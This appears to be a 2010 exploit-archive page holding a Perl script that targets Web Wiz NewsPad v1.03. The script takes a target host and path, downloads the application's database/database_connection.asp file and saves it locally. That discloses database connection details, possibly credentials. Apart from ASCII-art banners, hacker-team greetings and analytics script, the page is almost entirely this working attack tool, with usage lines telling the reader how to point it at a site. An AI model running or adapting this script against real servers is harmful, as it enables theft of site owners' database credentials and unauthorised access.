web wiz newspad v1.03 Database Disclosure Exploit
Posted on 28 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>web wiz newspad v1.03 Database Disclosure Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================= web wiz newspad v1.03 Database Disclosure Exploit ================================================= #!/usr/bin/perl -w # # web wiz newspad v1.03 Database Disclosure Exploit # # Found & Coded: indoushka # # Date: 25/07/2010 # # Home: www.sec4ever.com # # Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel # special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller # Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net # MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH # # Download : http://www.webwiznewspad.com use LWP::Simple; use LWP::UserAgent; system('cls'); system('title web wiz newspad v1.03 Database Disclosure Exploit'); system('color a'); if(@ARGV < 2) { print "[-]How To Use "; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ "; print "[+] usage2 : perl $0 localhost / "; } print " ************************************************************************ "; print " 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 "; print " _ __ __ __ 1 "; print "1 /' __ /'__` / \__ /'__` 0 "; print " /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 "; print "1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 "; print " / / / / \__/ \_ \_ / 1 "; print "1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 "; print " /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 "; print "1 \____/ >> Exploit database separated by exploit 0 "; print " /___/ type (local, remote, DoS, etc.) 1 "; print "1 1 "; print " [+] Site : Inj3ct0r.com 0 "; print "1 [+] Support e-mail : submit[at]inj3ct0r.com 1 "; print " 0 "; print "1 ####################################### 1 "; print " I'm indoushka member from Inj3ct0r Team 1 "; print "1 ####################################### 0 "; print " -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 "; ($TargetIP, $path, $File,) = @ARGV; $File="database/database_connection.asp"; my $url = "http://" . $TargetIP . $path . $File; print " wait!!! "; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/database_connection.asp"); if ($request->is_success) { print "[+] $url Exploited! "; print "[+] Database saved to D:/database_connection.asp "; exit(); } else { print "[!] Exploiting $url Failed ! [!] ".$request->status_line." "; exit(); } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>